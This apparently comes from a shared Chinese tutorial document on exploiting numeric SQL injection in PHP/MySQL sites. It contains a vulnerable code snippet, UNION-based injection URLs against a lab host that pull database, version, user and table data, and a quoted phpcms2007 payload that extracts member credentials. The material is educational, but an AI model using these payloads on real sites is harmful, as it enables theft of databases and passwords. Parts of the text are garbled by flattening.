php注射漏洞的总结与讲解.doc

《php注射漏洞的总结与讲解.doc》由会员分享，可在线阅读，更多相关《php注射漏洞的总结与讲解.doc（8页珍藏版）》请在淘文阁 - 分享文档赚钱的网站上搜索。

1、Php注射漏洞的总结与讲解1. 前置知识 php和mysql的一些基础的应用和总结这里的前置知识我会渗透到一下的教程当中所以不作为一课讲解2. php+mysql数字型注射漏洞的利用方法 本节课程用的是随便在站长站下载一个php代码发现这个作者自己说自己是第一次写完成程序，看来不错啊，有漏洞在所难免，而且很多漏洞都是非常经典的。所以我们学习他的安全的同时也要学习着帮他修补下漏洞。这节课程讲的是php的数字型注射，所以我们就不多罗嗦了。 我们首先打开article.php文件，看如下代码：$tid = $_GETid;$sql = select * from diary where id = $

2、tid;$sql1 = update diary set hit=hit+1 where id = $tid;/点击率/$hit = mysql_query(update diary set hit=hit+1 where id=.$GETid);/点击率$result = mysql_query($sql);mysql_query - 发送一条 MySQL 查询这里是关键，get获取id并没做任何过滤，然后赋值一个sql查询语句，接着发送mysql查询。这样漏洞很显然就出来了，而变量tid是属于数字类型没有被引号扩起来，所以利用比较简单，这次讲解主要讲解关于Union，and，or等注入手法

3、。跟asp字符型注入一样，我们and 1=1 ,and 1=2 判断是否纯在漏洞。 Ord（）/将字符转换为ascii码 Strlen（）/获取字符串长度 substr(string,start,length)参数描述string必需。规定要返回其中一部分的字符串。start必需。规定在字符串的何处开始。 正数 - 在字符串的指定位置开始 负数 - 在从字符串结尾的指定位置开始 0 - 在字符串中的第一个字符处开始lengthlength可选。规定要返回的字符串长度。默认是直到字符串的结尾。 正数- 从 start 参数所在的位置返回 负数- 从字符串末端返回Php注解有两种形式/*，/*/，

4、#。这里如果大家有看一些黑客类杂志或者有看过一些网站入侵文章就会有些了解。例如：phpcms2007的漏洞guestbook/?gid=1&keyid=%d5/*/union/*/select/*/1,2,3,4,concat(userid,0x7C,username,0x7C,password,0x7C,authstr),6,7,8,9,10,11,12,13,14,15,16,17%20from%20phpcms_member%20where%20groupid=1%23这里不禁利用了/*/还利用了# / #的URL编码为%23 空格的URL编码为%20$sql = select * fr

5、om diary where id = $tid;还是这句，我们先根据这句话来分析，到phpmyadmin找到diary 表看有多少个字段idtitlecontentdatehitcid栏目id71fsdfsdffdsfddsfsdfdsfdsf2009-01-204072fdsfsdfdfsdfsdfdsfdsfsd2009-01-201719我们发现有六个字段。为什么要来看这个呢？Union联合查询：首先我们需要学习下联合查询union。大多数php入侵都是利用这个union。（在php4以前版本不适用。）UNION指令的目的是将两个 SQL 语句的结果合并起来。从这个角度来看，UNION

6、跟JOIN有些许类似，因为这两个指令都可以由多个表格中撷取资料。UNION的一个限制是两个 SQL 语句所产生的栏位需要是同样的资料种类。另外，当我们用UNION这个指令时，我们只会看到不同的资料值 (类似 SELECTDISTINCT)。UNION的语法如下：SQL 语句 1UNIONSQL 语句 2假设我们有以下的两个表格，Store_Information表格store_nameSalesDateLos Angeles$1500Jan-05-1999San Diego$250Jan-07-1999Los Angeles$300Jan-08-1999Boston$700Jan-08-199

7、9Internet Sales表格DateSalesJan-07-1999$250Jan-10-1999$535Jan-11-1999$320Jan-12-1999$750而我们要找出来所有有营业额 (sales) 的日子。要达到这个目的，我们用以下的 SQL 语句：SELECT Date FROM Store_InformationUNIONSELECT Date FROM Internet_Sales结果:DateJan-05-1999Jan-07-1999Jan-08-1999Jan-10-1999Jan-11-1999Jan-12-1999有一点值得注意的是，如果我们在任何一个 SQL

8、 语句 (或是两句都一起) 用 SELECT DISTINCT Date 的话，那我们会得到完全一样的结果。我们来看这个图，画的不好请见谅，呵呵。接下来实战下。http:/192.168.102.128/diary/article.php?id=72%20and%201=2%20union%20select%201,2,3,4,5,6%23获取基础信息：（mysql内置函数）Database() 数据库名称。User() 用户名Version()版本其他的不多接受 只说这几个。其中比较主要的是数据库名和版本信息。http:/192.168.102.128/diary/article.php?i

9、d=72%20and%201=2%20union%20select%201,database(),version(),4,user(),6%23猜解表信息：http:/192.168.102.128/diary/article.php?id=72%20and%201=2%20union%20select%201,2,3,4,5,6%20from%20admin%23正常表返回信息：http:/192.168.102.128/diary/article.php?id=72%20and%201=2%20union%20select%201,2,3,4,5,6%20from%20adfsdfs%23

10、错误表返回信息：从这里我们就能看出来当我们猜解表猜解正确时候会返回联合查询信息，当错误时候会出现错误信息。猜列和猜表差不多。http:/192.168.102.128/diary/article.php?id=72%20and%201=2%20union%20select%201,2,info,4,5,6%20from%20otherinfo%23otherinfo表infonoticelinkfdsfddddddddddddddddddddddddddddddddddddddddddd.fdsfddddddddddddddddddddddddddddddddddddddddddd.fdsfddddddddddddddddd这样就能直接看到表列里的内容了。因为我们这里是测试所以没有正常的找用户名密码，而是随便找一个测试的表和列